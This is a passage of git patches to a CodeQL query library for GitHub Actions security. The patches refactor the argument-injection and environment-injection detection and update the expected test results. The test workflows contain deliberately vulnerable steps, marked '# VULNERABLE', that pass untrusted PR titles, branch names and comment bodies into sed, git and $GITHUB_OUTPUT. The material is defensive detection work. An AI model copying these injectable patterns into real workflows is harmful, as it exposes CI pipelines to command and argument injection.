$GITHUB_OUTPUT\n | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | +| .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | | .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$( Date: Tue, 15 Oct 2024 09:48:01 +0200 Subject: [PATCH 586/707] Move arg injection sinks to ShellScript class --- ql/lib/codeql/actions/Ast.qll | 8 ++ ql/lib/codeql/actions/Bash.qll | 52 ++++++++++-- ql/lib/codeql/actions/PowerShell.qll | 12 +++ ql/lib/codeql/actions/ast/internal/Ast.qll | 8 ++ .../security/ArgumentInjectionQuery.qll | 58 +++---------- ql/test/library-tests/commands.expected | 84 +++++++++---------- .../.github/workflows/arg_injection.yml | 12 +++ .../ArgumentInjectionCritical.expected | 1 - 8 files changed, 139 insertions(+), 96 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 620f74e25bb8..e41354ce31b6 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -354,6 +354,14 @@ class ShellScript extends ScalarValueImpl instanceof ShellScriptImpl { predicate getACmdReachingGitHubPathWrite(string cmd) { super.getACmdReachingGitHubPathWrite(cmd) } + predicate getAnEnvReachingArgumentInjectionSink(string var, string command, string argument) { + super.getAnEnvReachingArgumentInjectionSink(var, command, argument) + } + + predicate getACmdReachingArgumentInjectionSink(string cmd, string command, string argument) { + super.getACmdReachingArgumentInjectionSink(cmd, command, argument) + } + predicate fileToGitHubEnv(string path) { super.fileToGitHubEnv(path) } predicate fileToGitHubOutput(string path) { super.fileToGitHubOutput(path) } diff --git a/ql/lib/codeql/actions/Bash.qll b/ql/lib/codeql/actions/Bash.qll index 541ab437db2b..12866a141a66 100644 --- a/ql/lib/codeql/actions/Bash.qll +++ b/ql/lib/codeql/actions/Bash.qll @@ -133,7 +133,8 @@ class BashShellScript extends ShellScript { this.doStmtRestoreQuotedStrings(i, round, _, new) | new order by round - ) + ) and + not result.indexOf("qstr:") > -1 } private predicate doStmtRestoreCmdSubstitutions(int line, int round, string old, string new) { @@ -155,7 +156,8 @@ class BashShellScript extends ShellScript { this.doStmtRestoreCmdSubstitutions(i, round, _, new) | new order by round - ) + ) and + not result.indexOf("cmdsubs:") > -1 } override string getAStmt() { result = this.getStmt(_) } @@ -186,7 +188,8 @@ class BashShellScript extends ShellScript { this.doCmdRestoreQuotedStrings(i, round, _, new) | new order by round - ) + ) and + not result.indexOf("qstr:") > -1 } private predicate doCmdRestoreCmdSubstitutions(int line, int round, string old, string new) { @@ -208,13 +211,16 @@ class BashShellScript extends ShellScript { this.doCmdRestoreCmdSubstitutions(i, round, _, new) | new order by round - ) + ) and + not result.indexOf("cmdsubs:") > -1 } string getACmd() { result = this.getCmd(_) } override string getCommand(int i) { - result = this.getCmd(i) and + // remove redirection + result = + this.getCmd(i).regexpReplaceAll("(>|>>|2>|2>>|<|<<<)\\s*[\\{\\}\\$\"'_\\-0-9a-zA-Z]+$", "") and // exclude variable declarations not result.regexpMatch("^[a-zA-Z0-9\\-_]+=") and // exclude the following keywords @@ -286,6 +292,18 @@ class BashShellScript extends ShellScript { Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_PATH", _) } + override predicate getAnEnvReachingArgumentInjectionSink( + string var, string command, string argument + ) { + Bash::envReachingArgumentInjectionSink(this, var, command, argument) + } + + override predicate getACmdReachingArgumentInjectionSink( + string cmd, string command, string argument + ) { + Bash::cmdReachingArgumentInjectionSink(this, cmd, command, argument) + } + override predicate fileToGitHubEnv(string path) { Bash::fileToFileWrite(this, "GITHUB_ENV", path) } @@ -633,6 +651,30 @@ module Bash { ) } + predicate envReachingArgumentInjectionSink( + BashShellScript script, string source, string command, string argument + ) { + exists(string cmd, string regex, int command_group, int argument_group | + cmd = script.getACommand() and + argumentInjectionSinksDataModel(regex, command_group, argument_group) and + argument = cmd.regexpCapture(regex, argument_group) and + command = cmd.regexpCapture(regex, command_group) and + envReachingRunExpr(script, source, argument) + ) + } + + predicate cmdReachingArgumentInjectionSink( + BashShellScript script, string source, string command, string argument + ) { + exists(string cmd, string regex, int command_group, int argument_group | + cmd = script.getACommand() and + argumentInjectionSinksDataModel(regex, command_group, argument_group) and + argument = cmd.regexpCapture(regex, argument_group) and + command = cmd.regexpCapture(regex, command_group) and + cmdReachingRunExpr(script, source, argument) + ) + } + /** * Holds if a command output is used, directly or indirectly, in a Run's step expression. * Where the expression is a string captured from the Run's script. diff --git a/ql/lib/codeql/actions/PowerShell.qll b/ql/lib/codeql/actions/PowerShell.qll index 1727930c2a3f..3ae706970fa7 100644 --- a/ql/lib/codeql/actions/PowerShell.qll +++ b/ql/lib/codeql/actions/PowerShell.qll @@ -42,6 +42,18 @@ class PowerShellScript extends ShellScript { override predicate getACmdReachingGitHubPathWrite(string cmd) { none() } + override predicate getAnEnvReachingArgumentInjectionSink( + string var, string command, string argument + ) { + none() + } + + override predicate getACmdReachingArgumentInjectionSink( + string cmd, string command, string argument + ) { + none() + } + override predicate fileToGitHubEnv(string path) { none() } override predicate fileToGitHubOutput(string path) { none() } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 43772a978c58..7c433a39e620 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -227,6 +227,14 @@ class ShellScriptImpl extends ScalarValueImpl { abstract predicate getACmdReachingGitHubPathWrite(string cmd); + abstract predicate getAnEnvReachingArgumentInjectionSink( + string var, string command, string argument + ); + + abstract predicate getACmdReachingArgumentInjectionSink( + string cmd, string command, string argument + ); + abstract predicate fileToGitHubEnv(string path); abstract predicate fileToGitHubOutput(string path); diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll index a0309437292a..f7e4a9834452 100644 --- a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll @@ -9,23 +9,6 @@ abstract class ArgumentInjectionSink extends DataFlow::Node { abstract string getCommand(); } -/** - * Holds if an environment variable is used, directly or indirectly, as an argument to a dangerous command - * in a Run step. - * Where the command is a string captured from the Run's script. - */ -bindingset[var] -predicate envToArgInjSink(string var, Run run, string command) { - exists(string argument, string cmd, string regexp, int command_group, int argument_group | - run.getScript().getACommand() = cmd and - argumentInjectionSinksDataModel(regexp, command_group, argument_group) and - command = cmd.regexpCapture(regexp, command_group) and - argument = cmd.regexpCapture(regexp, argument_group) and - Bash::envReachingRunExpr(run.getScript(), var, argument) and - exists(run.getInScopeEnvVarExpr(var)) - ) -} - /** * Holds if a Run step declares an environment variable, uses it as the argument to a command vulnerable to argument injection. * e.g. @@ -36,23 +19,16 @@ predicate envToArgInjSink(string var, Run run, string command) { */ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { string command; + string argument; ArgumentInjectionFromEnvVarSink() { exists(Run run, string var | - envToArgInjSink(var, run, command) and - run.getScript() = this.asExpr() and - exists(run.getInScopeEnvVarExpr(var)) - ) - or - exists( - Run run, string cmd, string argument, string regexp, int argument_group, int command_group - | - run.getScript().getACommand() = cmd and run.getScript() = this.asExpr() and - argumentInjectionSinksDataModel(regexp, command_group, argument_group) and - argument = cmd.regexpCapture(regexp, argument_group) and - command = cmd.regexpCapture(regexp, command_group) and - argument.regexpMatch(".*\\$(\\{)?(GITHUB_HEAD_REF).*") + ( + exists(run.getInScopeEnvVarExpr(var)) or + var = "GITHUB_HEAD_REF" + ) and + run.getScript().getAnEnvReachingArgumentInjectionSink(var, command, argument) ) } @@ -68,18 +44,13 @@ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { */ class ArgumentInjectionFromCommandSink extends ArgumentInjectionSink { string command; + string argument; ArgumentInjectionFromCommandSink() { - exists( - CommandSource source, Run run, string cmd, string argument, string regexp, int argument_group, - int command_group - | + exists(CommandSource source, Run run | run = source.getEnclosingRun() and this.asExpr() = run.getScript() and - cmd = run.getScript().getACommand() and - argumentInjectionSinksDataModel(regexp, command_group, argument_group) and - argument = cmd.regexpCapture(regexp, argument_group) and - command = cmd.regexpCapture(regexp, command_group) + run.getScript().getACmdReachingArgumentInjectionSink(source.getCommand(), command, argument) ) } @@ -103,14 +74,9 @@ private module ArgumentInjectionConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource or - exists( - Run run, string argument, string cmd, string regexp, int command_group, int argument_group - | + exists(Run run | run.getScript() = source.asExpr() and - run.getScript().getACommand() = cmd and - argumentInjectionSinksDataModel(regexp, command_group, argument_group) and - argument = cmd.regexpCapture(regexp, argument_group) and - argument.regexpMatch(".*\\$(\\{)?(GITHUB_HEAD_REF).*") + run.getScript().getAnEnvReachingArgumentInjectionSink("GITHUB_HEAD_REF", _, _) ) } @@ -120,7 +86,7 @@ private module ArgumentInjectionConfig implements DataFlow::ConfigSig { exists(Run run, string var | run.getInScopeEnvVarExpr(var) = pred.asExpr() and succ.asExpr() = run.getScript() and - envToArgInjSink(var, run, _) + run.getScript().getAnEnvReachingArgumentInjectionSink(var, _, _) ) } } diff --git a/ql/test/library-tests/commands.expected b/ql/test/library-tests/commands.expected index e78f152e60b6..d5536ca1c74d 100644 --- a/ql/test/library-tests/commands.expected +++ b/ql/test/library-tests/commands.expected @@ -22,15 +22,11 @@ | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 2 echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo qstr:0:0:12:34:githubeventcommentbody | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo qstr:2:0:12:34:githubeventcommentbody | | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 2 echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 3 echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 3 echo qstr:0:0:12:34:githubeventcommentbody | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 3 echo qstr:2:0:12:34:githubeventcommentbody | | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/multiline2.yml:11:9:15:6 | Run Step | echo "CHANGELOGEOF" | -| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | echo "changelog< issue.txt << EOL | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | cat > issue.txt < | | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | ${ISSUE_BODY} | | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | EOL | | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | FOO | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | cat << EOL | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | cat < | | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | tee -a $GITHUB_ENV | | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | EOF | | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | Hello | | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | World | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | cat < file.txt | | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | EOF | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | cat <<-EOF | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | cat < | | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | echo "FOO=$TITLE" | | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | tee -a "$GITHUB_ENV" | | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | cat issue.txt | @@ -84,77 +80,77 @@ | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | tr -d ' ' | | .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "$TITLE" | | .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "EOF" | -| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "changelog<> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "CHANGELOGEOF" | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "changelog<> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "$EOF" >> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "status<<$EOF" >> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "$EOF" >> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo $output >> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | echo 'JSON_RESPONSE<> "$GITHUB_ENV" | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | } | | .github/workflows/multiline.yml:30:9:34:6 | Run Step | ${{ toJson(github.event) }} | | .github/workflows/multiline.yml:30:9:34:6 | Run Step | EOF | | .github/workflows/multiline.yml:30:9:34:6 | Run Step | cat <<-"EOF" > event.json | | .github/workflows/multiline.yml:34:9:40:6 | Run Step | ${ISSUE_BODY} | | .github/workflows/multiline.yml:34:9:40:6 | Run Step | EOL | | .github/workflows/multiline.yml:34:9:40:6 | Run Step | FOO | -| .github/workflows/multiline.yml:34:9:40:6 | Run Step | cat >> $GITHUB_ENV << EOL | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | cat >> $GITHUB_ENV < | | .github/workflows/multiline.yml:40:9:46:6 | Run Step | ${ISSUE_BODY} | | .github/workflows/multiline.yml:40:9:46:6 | Run Step | EOL | | .github/workflows/multiline.yml:40:9:46:6 | Run Step | FOO | -| .github/workflows/multiline.yml:40:9:46:6 | Run Step | cat > issue.txt << EOL | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | cat > issue.txt < | | .github/workflows/multiline.yml:46:9:52:6 | Run Step | ${ISSUE_BODY} | | .github/workflows/multiline.yml:46:9:52:6 | Run Step | EOL | | .github/workflows/multiline.yml:46:9:52:6 | Run Step | FOO | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | cat << EOL >> $GITHUB_ENV | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | cat << EOL | | .github/workflows/multiline.yml:52:9:58:6 | Run Step | EOF | | .github/workflows/multiline.yml:52:9:58:6 | Run Step | Hello | | .github/workflows/multiline.yml:52:9:58:6 | Run Step | World | -| .github/workflows/multiline.yml:52:9:58:6 | Run Step | cat < file.txt | | .github/workflows/multiline.yml:58:9:63:6 | Run Step | EOF | -| .github/workflows/multiline.yml:58:9:63:6 | Run Step | cat <<-EOF >> "$GITHUB_ENV" | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | cat <<-EOF | | .github/workflows/multiline.yml:58:9:63:6 | Run Step | echo "FOO=$TITLE" | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | cat issue.txt | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | sed 's/\\\\r/\\\\n/g' | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | tr -d ' ' | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "$TITLE" >> $GITHUB_ENV | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "EOF" >> $GITHUB_ENV | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_ENV | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "$TITLE" | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "EOF" | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> "$GITHUB_ENV" | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | } | | .github/workflows/multiline.yml:78:9:85:6 | Run Step | echo '$ISSUE' | | .github/workflows/multiline.yml:78:9:85:6 | Run Step | echo 'EOF' | -| .github/workflows/multiline.yml:78:9:85:6 | Run Step | echo 'JSON_RESPONSE<> "$GITHUB_ENV" | -| .github/workflows/multiline.yml:85:9:89:29 | Run Step | echo 'JSON_RESPONSE<> "$GITHUB_ENV" | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | echo 'JSON_RESPONSE< | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | } | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | echo 'JSON_RESPONSE< | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | } | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | venv/bin/activate | | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | . venv/bin/activate | | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | . venv/bin/activate | @@ -171,7 +167,7 @@ | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | echo foo | | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | sh venv/bin/activate.sh | | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | echo foo | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | sh venv/bin/activate.sh | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | python venv/bin/activate.py | | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | echo foo | | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | python venv/bin/activate.py | diff --git a/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml index 59ea1564bdd0..42ba8bf27496 100644 --- a/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml +++ b/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml @@ -34,3 +34,15 @@ jobs: - run: | BODY=$(git log --format=%s) sed "s/FOO/$BODY/g" > /tmp/foo + + - name: Checkout ref + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + - name: Detect new changesets + id: added-files + run: | + delimiter="$(openssl rand -hex 8)" + echo "changesets<<${delimiter}" >> "${GITHUB_OUTPUT}" + echo "$(git diff --name-only --diff-filter=A ${{ steps.comment-branch.outputs.base_sha }} ${{ steps.parse-sha.outputs.sha }} .changeset/*.md)" >> "${GITHUB_OUTPUT}" + echo "${delimiter}" >> "${GITHUB_OUTPUT}" diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected index 326cb935f7c0..1e4051fef432 100644 --- a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected @@ -26,5 +26,4 @@ subpaths | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | -| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | git | | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | From b49cd3b916e792221221c0215df29e448fa91019 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 16 Oct 2024 08:48:32 +0200 Subject: [PATCH 587/707] Better handling of EnvVar Injection and Argument Injection --- ql/lib/codeql/actions/Bash.qll | 18 +++--- ql/lib/codeql/actions/config/Config.qll | 16 +---- .../codeql/actions/dataflow/FlowSources.qll | 4 +- .../actions/security/EnvVarInjectionQuery.qll | 57 ++++++++++++----- .../actions/security/PoisonableSteps.qll | 11 +--- .../security/UntrustedCheckoutQuery.qll | 8 +-- .../ext/config/argument_injection_sinks.yml | 15 +++-- ql/lib/ext/config/poisonable_steps.yml | 16 ++--- ql/lib/ext/config/untrusted_git_commands.yml | 26 ++++---- ql/test/library-tests/commands.expected | 36 +++++------ .../library-tests/poisonable_steps.expected | 1 - .../CWE-077/.github/workflows/test16.yml | 35 +++++++++++ .../CWE-077/EnvVarInjectionCritical.expected | 15 +++-- .../CWE-077/EnvVarInjectionMedium.expected | 11 ++-- .../.github/workflows/arg_injection.yml | 62 +++++++++++++------ .../ArgumentInjectionCritical.expected | 54 +++++++++------- .../CWE-088/ArgumentInjectionMedium.expected | 33 +++++----- 17 files changed, 246 insertions(+), 172 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml diff --git a/ql/lib/codeql/actions/Bash.qll b/ql/lib/codeql/actions/Bash.qll index 12866a141a66..672f7727f5b5 100644 --- a/ql/lib/codeql/actions/Bash.qll +++ b/ql/lib/codeql/actions/Bash.qll @@ -220,9 +220,13 @@ class BashShellScript extends ShellScript { override string getCommand(int i) { // remove redirection result = - this.getCmd(i).regexpReplaceAll("(>|>>|2>|2>>|<|<<<)\\s*[\\{\\}\\$\"'_\\-0-9a-zA-Z]+$", "") and + this.getCmd(i) + .regexpReplaceAll("(>|>>|2>|2>>|<|<<<)\\s*[\\{\\}\\$\"'_\\-0-9a-zA-Z]+$", "") + .trim() and // exclude variable declarations not result.regexpMatch("^[a-zA-Z0-9\\-_]+=") and + // exclude comments + not result.trim().indexOf("#") = 0 and // exclude the following keywords not result = [ @@ -359,11 +363,11 @@ module Bash { exists(string regexp | // $(cmd) regexp = ".*\\$\\(([^)]+)\\).*" and - cmd = expr.regexpCapture(regexp, 1) + cmd = expr.regexpCapture(regexp, 1).trim() or // `cmd` regexp = ".*`([^`]+)`.*" and - cmd = expr.regexpCapture(regexp, 1) + cmd = expr.regexpCapture(regexp, 1).trim() ) } @@ -657,8 +661,8 @@ module Bash { exists(string cmd, string regex, int command_group, int argument_group | cmd = script.getACommand() and argumentInjectionSinksDataModel(regex, command_group, argument_group) and - argument = cmd.regexpCapture(regex, argument_group) and - command = cmd.regexpCapture(regex, command_group) and + argument = cmd.regexpCapture(regex, argument_group).trim() and + command = cmd.regexpCapture(regex, command_group).trim() and envReachingRunExpr(script, source, argument) ) } @@ -669,8 +673,8 @@ module Bash { exists(string cmd, string regex, int command_group, int argument_group | cmd = script.getACommand() and argumentInjectionSinksDataModel(regex, command_group, argument_group) and - argument = cmd.regexpCapture(regex, argument_group) and - command = cmd.regexpCapture(regex, command_group) and + argument = cmd.regexpCapture(regex, argument_group).trim() and + command = cmd.regexpCapture(regex, command_group).trim() and cmdReachingRunExpr(script, source, argument) ) } diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index e3bf239565eb..82b7a53a9d7b 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -47,10 +47,6 @@ predicate externallyTriggerableEventsDataModel(string event) { private string commandLauncher() { result = ["", "sudo\\s+", "su\\s+", "xvfb-run\\s+"] } -private string commandPrefixDelimiter() { result = "(^|;|\\$\\(|`|\\||&&|\\|\\|)\\s*" } - -private string commandSuffixDelimiter() { result = "\\s*(;|\\||\\)|`|&&|\\|\\||$)" } - 